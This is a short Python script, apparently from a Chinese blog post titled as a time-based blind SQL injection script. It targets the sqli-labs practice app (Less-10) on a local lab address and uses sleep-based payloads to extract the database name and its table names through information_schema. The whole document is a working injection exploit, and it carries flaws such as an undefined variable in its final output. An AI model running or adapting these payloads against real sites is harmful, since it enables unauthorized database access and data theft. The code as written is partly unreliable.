import requests,time,string # 假设页面无任何回显需要用到时间注入 url='http://192.168.28.133/sqli-labs-master/Less-10/?id=1" and ' a1=0 for a in range(10): start=time.time() res=requests.get(f"{url}if(length(database())={a},sleep(2),1)-- -") response = res.text end=time.time() if end-start>1: a1=a print(f'库名长度为{a1}') break low = 'abcdefghijklmnopqrstuvw,xyz' res1='' for a2 in range(a1+1): for a3 in low: start = time.time() res3 = requests.get(f"{url}if(substr(database(),{a2},1)='{a3}',sleep(2),1)-- - ") response4=res3.text end = time.time() if end-start>1: res1+=a3 print(f'库名为{res1}') # 查表数量,不需要判断表的数量,直接gruop_concat res8=[] # 取表名 res7 = '' for a7 in range(1,60): for a8 in low: start = time.time() res6 = requests.get(f"{url}if(substr((SELECT group_concat(table_name) from information_schema.tables where table_schema='{res1}'),{a7},1)='{a8}',sleep(3),1) ") response6=res6.text end = time.time() if end - start > 2: res7+=a8 res8.append(res7) print(res8) print(f'数据库{res4}有{res8}表')
时间盲注脚本
最新推荐文章于 2024-05-21 06:57:45 发布